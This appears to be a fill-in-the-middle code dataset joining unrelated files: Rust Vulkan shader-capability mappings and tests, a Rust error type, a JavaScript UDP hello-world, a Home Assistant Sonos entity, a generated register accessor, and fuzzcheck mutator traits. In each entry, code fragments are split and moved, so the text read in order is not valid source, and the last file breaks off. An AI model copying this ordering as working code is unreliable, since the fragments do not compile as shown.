"shader_storage_buffer_array_non_uniform_indexing",
)],
Capability::StorageImageArrayNonUniformIndexing => &[DeviceRequirement::Feature(
"shader_storage_image_array_non_uniform_indexing",
)],
Capability::InputAttachmentArrayNonUniformIndexing => &[DeviceRequirement::Feature(
"shader_input_attachment_array_non_uniform_indexing",
)],
Capability::UniformTexelBufferArrayNonUniformIndexing => &[DeviceRequirement::Feature(
"shader_uniform_texel_buffer_array_non_uniform_indexing",
)],
Capability::StorageTexelBufferArrayNonUniformIndexing => &[DeviceRequirement::Feature(
"shader_storage_texel_buffer_array_non_uniform_indexing",
)],
Capability::Float16 => &[
DeviceRequirement::Feature("shader_float16"),
DeviceRequirement::Extension("amd_gpu_shader_half_float"),
],
Capability::Int8 => &[DeviceRequirement::Feature("shader_int8")],
Capability::StorageBuffer8BitAccess => {
&[DeviceRequirement::Feature("storage_buffer8_bit_access")]
}
Capability::UniformAndStorageBuffer8BitAccess => &[DeviceRequirement::Feature(
"uniform_and_storage_buffer8_bit_access",
)],
Capability::StoragePushConstant8 => &[DeviceRequirement::Feature("storage_push_constant8")],
Capability::VulkanMemoryModel => &[DeviceRequirement::Feature("vulkan_memory_model")],
Capability::VulkanMemoryModelDeviceScope => &[DeviceRequirement::Feature(
"vulkan_memory_model_device_scope",
)],
Capability::DenormPreserve => todo!(),
Capability::DenormFlushToZero => todo!(),
Capability::SignedZeroInfNanPreserve => todo!(),
Capability::RoundingModeRTE => todo!(),
Capability::RoundingModeRTZ => todo!(),
Capability::ComputeDerivativeGroupQuadsNV => {
&[DeviceRequirement::Feature("compute_derivative_group_quads")]
}
Capability::ComputeDerivativeGroupLinearNV => &[DeviceRequirement::Feature(
"compute_derivative_group_linear",
)],
Capability::FragmentBarycentricNV => {
&[DeviceRequirement::Feature("fragment_shader_barycentric")]
}
Capability::ImageFootprintNV => &[DeviceRequirement::Feature("image_footprint")],
Capability::MeshShadingNV => &[DeviceRequirement::Extension("nv_mesh_shader")],
Capability::RayTracingKHR | Capability::RayTracingProvisionalKHR => {
&[DeviceRequirement::Feature("ray_tracing_pipeline")]
}
Capability::RayQueryKHR | Capability::RayQueryProvisionalKHR => &[DeviceRequirement::Feature("ray_query")],
Capability::RayTraversalPrimitiveCullingKHR => &[DeviceRequirement::Feature(
"ray_traversal_primitive_culling",
)],
Capability::RayTracingNV => &[DeviceRequirement::Extension("nv_ray_tracing")],
// Capability::RayTracingMotionBlurNV => &[DeviceRequirement::Feature("ray_tracing_motion_blur")],
Capability::TransformFeedback => &[DeviceRequirement::Feature("transform_feedback")],
Capability::GeometryStreams => &[DeviceRequirement::Feature("geometry_streams")],
Capability::FragmentDensityEXT => &[
DeviceRequirement::Feature("fragment_density_map"),
DeviceRequirement::Feature("shading_rate_image"),
],
Capability::PhysicalStorageBufferAddresses => {
&[DeviceRequirement::Feature("buffer_device_address")]
}
Capability::CooperativeMatrixNV => &[DeviceRequirement::Feature("cooperative_matrix")],
Capability::IntegerFunctions2INTEL => {
&[DeviceRequirement::Feature("shader_integer_functions2")]
}
Capability::ShaderSMBuiltinsNV => &[DeviceRequirement::Feature("shader_sm_builtins")],
Capability::FragmentShaderSampleInterlockEXT => &[DeviceRequirement::Feature(
"fragment_shader_sample_interlock",
)],
Capability::FragmentShaderPixelInterlockEXT => &[DeviceRequirement::Feature(
"fragment_shader_pixel_interlock",
)],
Capability::FragmentShaderShadingRateInterlockEXT => &[
DeviceRequirement::Feature("fragment_shader_shading_rate_interlock"),
DeviceRequirement::Feature("shading_rate_image"),
],
Capability::DemoteToHelperInvocationEXT => &[DeviceRequirement::Feature(
"shader_demote_to_helper_invocation",
)],
Capability::FragmentShadingRateKHR => &[
DeviceRequirement::Feature("pipeline_fragment_shading_rate"),
DeviceRequirement::Feature("primitive_fragment_shading_rate"),
DeviceRequirement::Feature("attachment_fragment_shading_rate"),
],
// Capability::WorkgroupMemoryExplicitLayoutKHR => &[DeviceRequirement::Feature("workgroup_memory_explicit_layout")],
// Capability::WorkgroupMemoryExplicitLayout8BitAccessKHR => &[DeviceRequirement::Feature("workgroup_memory_explicit_layout8_bit_access")],
// Capability::WorkgroupMemoryExplicitLayout16BitAccessKHR => &[DeviceRequirement::Feature("workgroup_memory_explicit_layout16_bit_access")],
Capability::Addresses => panic!(), // not supported
Capability::Linkage => panic!(), // not supported
Capability::Kernel => panic!(), // not supported
Capability::Vector16 => panic!(), // not supported
Capability::Float16Buffer => panic!(), // not supported
Capability::ImageBasic => panic!(), // not supported
Capability::ImageReadWrite => panic!(), // not supported
Capability::ImageMipmap => panic!(), // not supported
Capability::Pipes => panic!(), // not supported
Capability::Groups => panic!(), // not supported
Capability::DeviceEnqueue => panic!(), // not supported
Capability::LiteralSampler => panic!(), // not supported
Capability::AtomicStorage => panic!(), // not supported
Capability::ImageRect => panic!(), // not supported
Capability::SampledRect => panic!(), // not supported
Capability::GenericPointer => panic!(), // not supported
Capability::SubgroupDispatch => panic!(), // not supported
Capability::NamedBarrier => panic!(), // not supported
Capability::PipeStorage => panic!(), // not supported
Capability::AtomicStorageOps => panic!(), // not supported
Capability::Float16ImageAMD => panic!(), // not supported
Capability::ShaderStereoViewNV => panic!(), // not supported
Capability::FragmentFullyCoveredEXT => panic!(), // not supported
Capability::SubgroupShuffleINTEL => panic!(), // not supported
Capability::SubgroupBufferBlockIOINTEL => panic!(), // not supported
Capability::SubgroupImageBlockIOINTEL => panic!(), // not supported
Capability::SubgroupImageMediaBlockIOINTEL => panic!(), // not supported
Capability::SubgroupAvcMotionEstimationINTEL => panic!(), // not supported
Capability::SubgroupAvcMotionEstimationIntraINTEL => panic!(), // not supported
Capability::SubgroupAvcMotionEstimationChromaINTEL => panic!(), // not supported
Capability::FunctionPointersINTEL => panic!(), // not supported
Capability::IndirectReferencesINTEL => panic!(), // not supported
Capability::FPGAKernelAttributesINTEL => panic!(), // not supported
Capability::FPGALoopControlsINTEL => panic!(), // not supported
Capability::FPGAMemoryAttributesINTEL => panic!(), // not supported
Capability::FPGARegINTEL => panic!(), // not supported
Capability::UnstructuredLoopControlsINTEL => panic!(), // not supported
Capability::KernelAttributesINTEL => panic!(), // not supported
Capability::BlockingPipesINTEL => panic!(), // not supported
}
}
/// Returns the Vulkan device requirement for a SPIR-V storage class.
fn storage_class_requirement(storage_class: &StorageClass) -> &'static [DeviceRequirement] {
match *storage_class {
StorageClass::UniformConstant => &[],
StorageClass::Input => &[],
StorageClass::Uniform => &[],
StorageClass::Output => &[],
StorageClass::Workgroup => &[],
StorageClass::CrossWorkgroup => &[],
StorageClass::Private => &[],
StorageClass::Function => &[],
StorageClass::Generic => &[],
StorageClass::PushConstant => &[],
StorageClass::AtomicCounter => &[],
StorageClass::Image => &[],
StorageClass::StorageBuffer => &[DeviceRequirement::Extension(
"khr_storage_buffer_storage_class",
)],
StorageClass::CallableDataKHR => todo!(),
StorageClass::IncomingCallableDataKHR => todo!(),
StorageClass::RayPayloadKHR => todo!(),
StorageClass::HitAttributeKHR => todo!(),
StorageClass::IncomingRayPayloadKHR => todo!(),
StorageClass::ShaderRecordBufferKHR => todo!(),
StorageClass::PhysicalStorageBuffer => todo!(),
StorageClass::CodeSectionINTEL => todo!(),
}
}
enum DeviceRequirement {
Feature(&'static str),
Extension(&'static str),
Version(u32, u32),
}
#[cfg(test)]
mod tests {
use super::*;
use std::path::PathBuf;
#[cfg(not(target_os = "windows"))]
pub fn path_separator() -> &'static str |
#[cfg(target_os = "windows")]
pub fn path_separator() -> &'static str {
"\\"
}
fn convert_paths(root_path: &Path, paths: &[String]) -> Vec<String> {
paths
.iter()
.map(|p| path_to_str(root_path.join(p).as_path()).to_owned())
.collect()
}
#[test]
fn test_bad_alignment() {
// vec3/mat3/mat3x* are problematic in arrays since their rust
// representations don't have the same array stride as the SPIR-V
// ones. E.g. in a vec3[2], the second element starts on the 16th
// byte, but in a rust [[f32;3];2], the second element starts on the
// 12th byte. Since we can't generate code for these types, we should
// create an error instead of generating incorrect code.
let includes: [PathBuf; 0] = [];
let defines: [(String, String); 0] = [];
let (comp, _) = compile(
None,
&Path::new(""),
"
#version 450
struct MyStruct {
vec3 vs[2];
};
layout(binding=0) uniform UBO {
MyStruct s;
};
void main() {}
",
ShaderKind::Vertex,
&includes,
&defines,
None,
None,
)
.unwrap();
let spirv = Spirv::new(comp.as_binary()).unwrap();
let res = std::panic::catch_unwind(|| {
structs::write_structs("", &spirv, &TypesMeta::default(), &mut HashMap::new())
});
assert!(res.is_err());
}
#[test]
fn test_trivial_alignment() {
let includes: [PathBuf; 0] = [];
let defines: [(String, String); 0] = [];
let (comp, _) = compile(
None,
&Path::new(""),
"
#version 450
struct MyStruct {
vec4 vs[2];
};
layout(binding=0) uniform UBO {
MyStruct s;
};
void main() {}
",
ShaderKind::Vertex,
&includes,
&defines,
None,
None,
)
.unwrap();
let spirv = Spirv::new(comp.as_binary()).unwrap();
structs::write_structs("", &spirv, &TypesMeta::default(), &mut HashMap::new());
}
#[test]
fn test_wrap_alignment() {
// This is a workaround suggested in the case of test_bad_alignment,
// so we should make sure it works.
let includes: [PathBuf; 0] = [];
let defines: [(String, String); 0] = [];
let (comp, _) = compile(
None,
&Path::new(""),
"
#version 450
struct Vec3Wrap {
vec3 v;
};
struct MyStruct {
Vec3Wrap vs[2];
};
layout(binding=0) uniform UBO {
MyStruct s;
};
void main() {}
",
ShaderKind::Vertex,
&includes,
&defines,
None,
None,
)
.unwrap();
let spirv = Spirv::new(comp.as_binary()).unwrap();
structs::write_structs("", &spirv, &TypesMeta::default(), &mut HashMap::new());
}
#[test]
fn test_include_resolution() {
let root_path = PathBuf::from(env!("CARGO_MANIFEST_DIR"));
let empty_includes: [PathBuf; 0] = [];
let defines: [(String, String); 0] = [];
let (_compile_relative, _) = compile(
Some(String::from("tests/include_test.glsl")),
&root_path,
"
#version 450
#include \"include_dir_a/target_a.glsl\"
#include \"include_dir_b/target_b.glsl\"
void main() {}
",
ShaderKind::Vertex,
&empty_includes,
&defines,
None,
None,
)
.expect("Cannot resolve include files");
let (_compile_include_paths, includes) = compile(
Some(String::from("tests/include_test.glsl")),
&root_path,
"
#version 450
#include <target_a.glsl>
#include <target_b.glsl>
void main() {}
",
ShaderKind::Vertex,
&[
root_path.join("tests").join("include_dir_a"),
root_path.join("tests").join("include_dir_b"),
],
&defines,
None,
None,
)
.expect("Cannot resolve include files");
assert_eq!(
includes,
convert_paths(
&root_path,
&[
vec!["tests", "include_dir_a", "target_a.glsl"].join(path_separator()),
vec!["tests", "include_dir_b", "target_b.glsl"].join(path_separator()),
]
)
);
let (_compile_include_paths_with_relative, includes_with_relative) = compile(
Some(String::from("tests/include_test.glsl")),
&root_path,
"
#version 450
#include <target_a.glsl>
#include <../include_dir_b/target_b.glsl>
void main() {}
",
ShaderKind::Vertex,
&[root_path.join("tests").join("include_dir_a")],
&defines,
None,
None,
)
.expect("Cannot resolve include files");
assert_eq!(
includes_with_relative,
convert_paths(
&root_path,
&[
vec!["tests", "include_dir_a", "target_a.glsl"].join(path_separator()),
vec!["tests", "include_dir_a", "../include_dir_b/target_b.glsl"]
.join(path_separator()),
]
)
);
let absolute_path = root_path
.join("tests")
.join("include_dir_a")
.join("target_a.glsl");
let absolute_path_str = absolute_path
.to_str()
.expect("Cannot run tests in a folder with non unicode characters");
let (_compile_absolute_path, includes_absolute_path) = compile(
Some(String::from("tests/include_test.glsl")),
&root_path,
&format!(
"
#version 450
#include \"{}\"
void main() {{}}
",
absolute_path_str
),
ShaderKind::Vertex,
&empty_includes,
&defines,
None,
None,
)
.expect("Cannot resolve include files");
assert_eq!(
includes_absolute_path,
convert_paths(
&root_path,
&[vec!["tests", "include_dir_a", "target_a.glsl"].join(path_separator())]
)
);
let (_compile_recursive_, includes_recursive) = compile(
Some(String::from("tests/include_test.glsl")),
&root_path,
"
#version 450
#include <target_c.glsl>
void main() {}
",
ShaderKind::Vertex,
&[
root_path.join("tests").join("include_dir_b"),
root_path.join("tests").join("include_dir_c"),
],
&defines,
None,
None,
)
.expect("Cannot resolve include files");
assert_eq!(
includes_recursive,
convert_paths(
&root_path,
&[
vec!["tests", "include_dir_c", "target_c.glsl"].join(path_separator()),
vec!["tests", "include_dir_c", "../include_dir_a/target_a.glsl"]
.join(path_separator()),
vec!["tests", "include_dir_b", "target_b.glsl"].join(path_separator()),
]
)
);
}
#[test]
fn test_macros() {
let empty_includes: [PathBuf; 0] = [];
let defines = vec![("NAME1", ""), ("NAME2", "58")];
let no_defines: [(String, String); 0] = [];
let need_defines = "
#version 450
#if defined(NAME1) && NAME2 > 29
void main() {}
#endif
";
let compile_no_defines = compile(
None,
&Path::new(""),
need_defines,
ShaderKind::Vertex,
&empty_includes,
&no_defines,
None,
None,
);
assert!(compile_no_defines.is_err());
let compile_defines = compile(
None,
&Path::new(""),
need_defines,
ShaderKind::Vertex,
&empty_includes,
&defines,
None,
None,
);
compile_defines.expect("Setting shader macros did not work");
}
}
| {
"/"
} |
error.rs | //
// Copyright 2021 StarCrossTech
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use std::{error, fmt};
#[derive(Debug)]
pub enum Error {
IoError(std::io::Error),
NotEnoughBytes,
CppException(cxx::Exception),
ArchNotFound(String),
MissingArg(String),
}
impl From<std::io::Error> for Error {
fn from(err: std::io::Error) -> Self {
Self::IoError(err)
}
}
impl From<cxx::Exception> for Error {
fn from(err: cxx::Exception) -> Self {
Self::CppException(err)
}
}
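// These From impls let callers bubble errors up with `?` (illustrative):
//
// fn read_image(path: &str) -> Result<Vec<u8>> { Ok(std::fs::read(path)?) }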
impl fmt::Display for Error {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self {
Self::IoError(e) => {
write!(f, "io error: {}", e)
}
Self::NotEnoughBytes => {
write!(f, "bytes not enough when decoding")
}
Self::CppException(e) => {
write!(f, "cpp exception: {}", e)
}
Self::ArchNotFound(s) => {
write!(f, "arch {} is not found in preset", s)
}
Self::MissingArg(s) => {
write!(f, "missing argument: {}", s)
}
}
}
}
impl error::Error for Error {
    fn source(&self) -> Option<&(dyn error::Error + 'static)> |
}
pub type Result<T> = std::result::Result<T, Error>;
| {
match *self {
Self::IoError(ref e) => Some(e),
Self::CppException(ref e) => Some(e),
_ => None,
}
} |
hello-world-example.js | // Creating Server
const { createServer } = require("../server")
var server = createServer(4444, function(packet,rinfo) {
console.log("Received from " + rinfo.address + ":" + rinfo.port + ": " + packet.title);
server.send(rinfo.address, rinfo.port, "Hello back", new Map().set("test1","a"));
server.send(rinfo.address, rinfo.port, "Hello back without Parameters");
});
// Creating Client
const { createClient } = require("../client")
| console.log("Received from Server: " + packet.title);
});
client.send("MyPacketWithParameters", new Map().set("test","a").set("test2","b"));
client.send("JustTitleNoParameters"); | var client = createClient("127.0.0.1", 4444, function(packet) { |
entity.py | """Entity representing a Sonos player."""
from __future__ import annotations
import logging
from pysonos.core import SoCo
import homeassistant.helpers.device_registry as dr
from homeassistant.helpers.dispatcher import (
async_dispatcher_connect,
async_dispatcher_send,
)
from homeassistant.helpers.entity import DeviceInfo, Entity
from .const import (
DOMAIN,
SONOS_ENTITY_CREATED,
SONOS_ENTITY_UPDATE,
SONOS_STATE_UPDATED,
)
from .speaker import SonosSpeaker
_LOGGER = logging.getLogger(__name__)
class SonosEntity(Entity):
"""Representation of a Sonos entity."""
def __init__(self, speaker: SonosSpeaker) -> None:
"""Initialize a SonosEntity."""
self.speaker = speaker
async def async_added_to_hass(self) -> None:
"""Handle common setup when added to hass."""
await self.speaker.async_seen()
self.async_on_remove(
async_dispatcher_connect(
self.hass,
f"{SONOS_ENTITY_UPDATE}-{self.soco.uid}",
self.async_update, # pylint: disable=no-member
)
)
self.async_on_remove(
async_dispatcher_connect(
self.hass,
f"{SONOS_STATE_UPDATED}-{self.soco.uid}",
self.async_write_ha_state,
)
)
@property
def soco(self) -> SoCo:
|
@property
def device_info(self) -> DeviceInfo:
"""Return information about the device."""
return {
"identifiers": {(DOMAIN, self.soco.uid)},
"name": self.speaker.zone_name,
"model": self.speaker.model_name.replace("Sonos ", ""),
"sw_version": self.speaker.version,
"connections": {(dr.CONNECTION_NETWORK_MAC, self.speaker.mac_address)},
"manufacturer": "Sonos",
"suggested_area": self.speaker.zone_name,
}
@property
def available(self) -> bool:
"""Return whether this device is available."""
return self.speaker.available
@property
def should_poll(self) -> bool:
"""Return that we should not be polled (we handle that internally)."""
return False
class SonosSensorEntity(SonosEntity):
"""Representation of a Sonos sensor entity."""
async def async_added_to_hass(self) -> None:
"""Handle common setup when added to hass."""
await super().async_added_to_hass()
async_dispatcher_send(
self.hass, f"{SONOS_ENTITY_CREATED}-{self.soco.uid}", self.platform.domain
)
| """Return the speaker SoCo instance."""
return self.speaker.soco |
lim0_hi.rs | #[doc = "Reader of register LIM0_HI"]
pub type R = crate::R<u16, super::LIM0_HI>;
#[doc = "Writer for register LIM0_HI"]
pub type W = crate::W<u16, super::LIM0_HI>;
#[doc = "Register LIM0_HI `reset()`'s with value 0x0fff"]
impl crate::ResetValue for super::LIM0_HI {
type Type = u16;
#[inline(always)]
fn reset_value() -> Self::Type {
0x0fff
}
}
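// Illustrative usage through the generated register API (peripheral and
// register accessor names assumed):
//
//   periph.lim0_hi.write(|w| w.value().bits(0x0abc).en().set_bit());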
#[doc = "Reader of field `VALUE`"]
pub type VALUE_R = crate::R<u16, u16>;
#[doc = "Write proxy for field `VALUE`"]
pub struct VALUE_W<'a> {
w: &'a mut W,
}
impl<'a> VALUE_W<'a> {
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bits(self, value: u16) -> &'a mut W {
self.w.bits = (self.w.bits & !0x0fff) | ((value as u16) & 0x0fff);
self.w
}
}
#[doc = "Reader of field `EN`"]
pub type EN_R = crate::R<bool, bool>;
#[doc = "Write proxy for field `EN`"]
pub struct EN_W<'a> {
w: &'a mut W,
}
impl<'a> EN_W<'a> {
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 15)) | (((value as u16) & 0x01) << 15);
self.w
}
}
impl R {
#[doc = "Bits 0:11 - High Limit for Channel 0"]
#[inline(always)]
pub fn value(&self) -> VALUE_R {
VALUE_R::new((self.bits & 0x0fff) as u16)
}
#[doc = "Bit 15 - Enable High Limit Comparison on Channel 0"]
#[inline(always)]
pub fn en(&self) -> EN_R {
EN_R::new(((self.bits >> 15) & 0x01) != 0) | #[doc = "Bits 0:11 - High Limit for Channel 0"]
#[inline(always)]
pub fn value(&mut self) -> VALUE_W {
VALUE_W { w: self }
}
#[doc = "Bit 15 - Enable High Limit Comparison on Channel 0"]
#[inline(always)]
pub fn en(&mut self) -> EN_W {
EN_W { w: self }
}
} | }
}
impl W { |
traits.rs | /*!
The fuzzcheck_traits crate defines the `Mutator` and `Serializer` traits
used by all fuzzcheck-related crates.
*/
use fuzzcheck_common::FuzzerEvent;
use std::fmt::Display;
use std::hash::Hash;
use std::path::PathBuf;
use crate::mutators::either::Either;
/**
A [Mutator] is an object capable of mutating a value for the purpose of
fuzz-testing.
For example, a mutator could change the value
`v1 = [1, 4, 2, 1]` to `v1' = [1, 5, 2, 1]`.
The idea is that if v1 is an “interesting” value to test, then v1' also
has a high chance of being “interesting” to test.
## Complexity
A mutator is also responsible for keeping track of the
[complexity](crate::Mutator::complexity) of a value. The complexity is,
roughly speaking, how large the value is.
For example, the complexity of a vector is the complexity of its length,
plus the sum of the complexities of its elements. So `vec![]` would have a
complexity of `1.0` and `vec![76]` would have a complexity of `10.0`: `2.0`
for its short length and `8.0` for the 8-bit integer “76”. But there is no
fixed rule for how to compute the complexity of a value, and it is up to you
to judge how “large” something is.
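As an illustrative sketch (not a rule imposed by the trait), a mutator for
`Vec<u8>` could count one point per element for the length plus eight bits per
element:
```ignore
fn complexity(&self, value: &Vec<u8>, _cache: &Self::Cache) -> f64 {
    // 1.0 base + 1.0 per element for the length, + 8.0 per 8-bit element
    (1.0 + value.len() as f64) + 8.0 * value.len() as f64
}
```
This matches the vector example above: `vec![]` scores `1.0` and `vec![76]`
scores `10.0`.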
## Cache
In order to mutate values efficiently, the mutator is able to make use of a
per-value *cache*. The Cache contains information associated with the value
that will make it faster to compute its complexity or apply a mutation to
it. For a vector, its cache is its total complexity, along with a vector of
the cache of each of its element.
## MutationStep
The same value will be passed to the mutator many times, so that it is
mutated in many different ways. There are different strategies to choose
what mutation to apply to a value. The first one is to create a list of
mutation operations, and choose one to apply randomly from this list.
However, one may want to have better control over which mutation operation
is used. For example, if the value to be mutated is of type `Option<T>`,
then you may want to first mutate it to `None`, and then always mutate it
to another `Some(t)`. This is where `MutationStep` comes in. The mutation
step is a type you define to allow you to keep track of which mutation
operation has already been tried. This allows you to deterministically
apply mutations to a value such that better mutations are tried first, and
duplicate mutations are avoided.
It is not always possible to schedule mutations in order. For that reason,
we have two methods: [random_mutate](crate::Mutator::random_mutate) executes
a random mutation, and [ordered_mutate](crate::Mutator::ordered_mutate) uses
the MutationStep to schedule mutations in order. The fuzzing engine only ever
uses `ordered_mutate` directly, but the former is sometimes necessary to
compose mutators together.
If you don't want to bother with ordered mutations, that is fine. In that
case, only implement `random_mutate` and call it from the `ordered_mutate`
method.
```ignore
fn random_mutate(&self, value: &mut Value, cache: &mut Self::Cache, max_cplx: f64) -> (Self::UnmutateToken, f64) {
// ...
}
fn ordered_mutate(&self, value: &mut Value, cache: &mut Self::Cache, step: &mut Self::MutationStep, max_cplx: f64) -> Option<(Self::UnmutateToken, f64)> {
Some(self.random_mutate(value, cache, max_cplx))
}
```
## Arbitrary
A mutator must also be able to generate new values from nothing. This is what
the [random_arbitrary](crate::Mutator::random_arbitrary) and
[ordered_arbitrary](crate::Mutator::ordered_arbitrary) methods are for. The
latter one is called by the fuzzer directly and uses an `ArbitraryStep` that
can be used to smartly generate more interesting values first and avoid
duplicates.
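As with mutations, a minimal implementation can delegate the ordered variant
to the random one (a sketch; it simply never reports exhaustion):
```ignore
fn ordered_arbitrary(&self, _step: &mut Self::ArbitraryStep, max_cplx: f64) -> Option<(Value, f64)> {
    Some(self.random_arbitrary(max_cplx))
}
```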
## Unmutate
Finally, it is important to note that values and caches are mutated
*in-place*. The fuzzer does not clone them before handing them to the
mutator. Therefore, the mutator also needs to know how to reverse each
mutation it performed. To do so, each mutation needs to return a token
describing how to reverse it. The [unmutate](crate::Mutator::unmutate)
method will later be called with that token to get the original value
and cache back.
For example, if the value is `[[1, 3], [5], [9, 8]]`, the mutator may
mutate it to `[[1, 3], [5], [9, 1, 8]]` and return the token:
`Element(2, Remove(1))`, which means that in order to reverse the
mutation, the element at index 2 has to be unmutated by removing
its element at index 1. In pseudocode:
```ignore
value = [[1, 3], [5], [9, 8]];
cache: c1 (omitted from example)
step: s1 (omitted from example)
let unmutate_token = self.mutate(&mut value, &mut cache, &mut step, max_cplx);
// value = [[1, 3], [5], [9, 1, 8]]
// token = Element(2, Remove(1))
// cache = c2
// step = s2
test(&value);
self.unmutate(&mut value, &mut cache, unmutate_token);
// value = [[1, 3], [5], [9, 8]]
// cache = c1 (back to original cache)
// step = s2 (step has not been reversed)
```
When a mutated value is deemed interesting by the fuzzing engine, the method
[validate_value](crate::Mutator::validate_value) is called on it in order to
get a new Cache and MutationStep for it. The same method is called when the
fuzzer reads values from a corpus to verify that they conform to the
mutator’s expectations. For example, a CharWithinRangeMutator
will check whether the character is within a certain range.
Note that in most cases, it is completely fine to never mutate a value’s cache,
since it is recomputed by [validate_value](crate::Mutator::validate_value) when
needed.
**/
pub trait Mutator<Value: Clone> {
/// Accompanies each value to help compute its complexity and mutate it efficiently.
type Cache: Clone;
/// Contains information about what mutations have already been tried.
type MutationStep: Clone;
/// Contains information about what arbitrary values have already been generated.
type ArbitraryStep: Clone;
/// Describes how to reverse a mutation
type UnmutateToken;
/// The first ArbitraryStep value to be passed to [ordered_arbitrary](crate::Mutator::ordered_arbitrary)
fn default_arbitrary_step(&self) -> Self::ArbitraryStep;
/// Verifies that the value conforms to the mutator’s expectations and, if it does,
/// returns the Cache and first MutationStep associated with that value.
fn validate_value(&self, value: &Value) -> Option<(Self::Cache, Self::MutationStep)>;
/// The maximum complexity that a Value can possibly have.
fn max_complexity(&self) -> f64;
/// The minimum complexity that a Value can possibly have.
fn min_complexity(&self) -> f64;
/// Computes the complexity of the value.
///
/// The returned value must be greater or equal than 0.
fn complexity(&self, value: &Value, cache: &Self::Cache) -> f64;
/// Generates an entirely new value based on the given `ArbitraryStep`.
///
/// The generated value should be smaller than the given `max_cplx`.
/// The return value is `None` if no new value can be generated or if
/// it is not possible to stay within the given complexity. Otherwise, it
/// is the value itself and its complexity, which must be equal to
/// `self.complexity(value, cache)`.
fn ordered_arbitrary(&self, step: &mut Self::ArbitraryStep, max_cplx: f64) -> Option<(Value, f64)>;
/// Generates an entirely new value.
/// The generated value should be smaller
/// than the given `max_cplx`. However, if that is not possible, then
/// it should return a value of the lowest possible complexity.
/// Returns the value itself and its complexity, which must be equal to
/// `self.complexity(value, cache)`
fn random_arbitrary(&self, max_cplx: f64) -> (Value, f64);
/// Mutates a value (and optionally its cache) based on the given
/// `MutationStep`.
/// The mutated value should be within the given
/// `max_cplx`. Returns `None` if it is no longer possible to mutate
/// the value to a new state, or if it is not possible to keep it under
/// `max_cplx`. Otherwise, returns the `UnmutateToken` that describes how to
/// undo the mutation as well as the new complexity of the value.
fn ordered_mutate(
&self,
value: &mut Value,
cache: &mut Self::Cache,
step: &mut Self::MutationStep,
max_cplx: f64,
) -> Option<(Self::UnmutateToken, f64)>;
/// Mutates a value (and optionally its cache). The mutated value should be
/// within the given `max_cplx`. But if that is not possible, then it
/// should mutate the value so that it has a minimal complexity. Returns
/// the `UnmutateToken` that describes how to undo the mutation as well as
/// the new complexity of the value.
fn random_mutate(&self, value: &mut Value, cache: &mut Self::Cache, max_cplx: f64) -> (Self::UnmutateToken, f64);
/// Undoes a mutation performed on the given value and cache, described by
/// the given `UnmutateToken`.
fn unmutate(&self, value: &mut Value, cache: &mut Self::Cache, t: Self::UnmutateToken);
}
/**
* A Serializer is used to encode and decode values into bytes.
*
* One possible implementation would be to use `serde` to implement
* both required functions. But we also want to be able to fuzz-test
* types that are not serializable with `serde`, which is why this
* Serializer trait exists.
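 *
 * As an illustration only, a hypothetical JSON-based serializer might look
 * like this:
 *
 * ```ignore
 * struct JsonSerializer;
 * impl Serializer for JsonSerializer {
 *     type Value = serde_json::Value;
 *     fn is_utf8(&self) -> bool { true }
 *     fn extension(&self) -> &str { "json" }
 *     fn from_data(&self, data: &[u8]) -> Option<Self::Value> {
 *         serde_json::from_slice(data).ok()
 *     }
 *     fn to_data(&self, value: &Self::Value) -> Vec<u8> {
 *         // serializing a serde_json::Value to bytes does not fail in practice
 *         serde_json::to_vec(value).unwrap()
 *     }
 * }
 * ```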
*/
pub trait Serializer {
type Value;
fn is_utf8(&self) -> bool;
fn extension(&self) -> &str;
fn from_data(&self, data: &[u8]) -> Option<Self::Value>;
fn to_data(&self, value: &Self::Value) -> Vec<u8>;
}
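/// A type that wraps a [Mutator](crate::Mutator) and simply delegates to it.
///
/// Implementing `MutatorWrapper` is enough to obtain a `Mutator` implementation
/// through the blanket impl below; `Box<M>` uses this mechanism.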
pub trait MutatorWrapper {
type Wrapped;
fn wrapped_mutator(&self) -> &Self::Wrapped;
}
impl<T: Clone, W, M> Mutator<T> for M
where
M: MutatorWrapper<Wrapped = W>,
W: Mutator<T>,
{
type Cache = W::Cache;
type MutationStep = W::MutationStep;
type ArbitraryStep = W::ArbitraryStep;
type UnmutateToken = W::UnmutateToken;
#[no_coverage]
fn default_arbitrary_step(&self) -> Self::ArbitraryStep {
self.wrapped_mutator().default_arbitrary_step()
}
#[no_coverage]
fn validate_value(&self, value: &T) -> Option<(Self::Cache, Self::MutationStep)> {
self.wrapped_mutator().validate_value(value)
}
#[no_coverage]
fn max_complexity(&self) -> f64 {
self.wrapped_mutator().max_complexity()
}
#[no_coverage]
fn min_complexity(&self) -> f64 {
self.wrapped_mutator().min_complexity()
}
#[no_coverage]
fn complexity(&self, value: &T, cache: &Self::Cache) -> f64 {
self.wrapped_mutator().complexity(value, cache)
}
#[no_coverage]
fn ordered_arbitrary(&self, step: &mut Self::ArbitraryStep, max_cplx: f64) -> Option<(T, f64)> {
self.wrapped_mutator().ordered_arbitrary(step, max_cplx)
}
#[no_coverage]
fn random_arbitrary(&self, max_cplx: f64) -> (T, f64) {
self.wrapped_mutator().random_arbitrary(max_cplx)
}
#[no_coverage]
fn ordered_mutate(
&self,
value: &mut T,
cache: &mut Self::Cache,
step: &mut Self::MutationStep,
max_cplx: f64,
) -> Option<(Self::UnmutateToken, f64)> {
self.wrapped_mutator().ordered_mutate(value, cache, step, max_cplx)
}
#[no_coverage]
fn random_mutate(&self, value: &mut T, cache: &mut Self::Cache, max_cplx: f64) -> (Self::UnmutateToken, f64) {
self.wrapped_mutator().random_mutate(value, cache, max_cplx)
}
#[no_coverage]
fn unmutate(&self, value: &mut T, cache: &mut Self::Cache, t: Self::UnmutateToken) {
self.wrapped_mutator().unmutate(value, cache, t)
}
}
impl<M> MutatorWrapper for Box<M> {
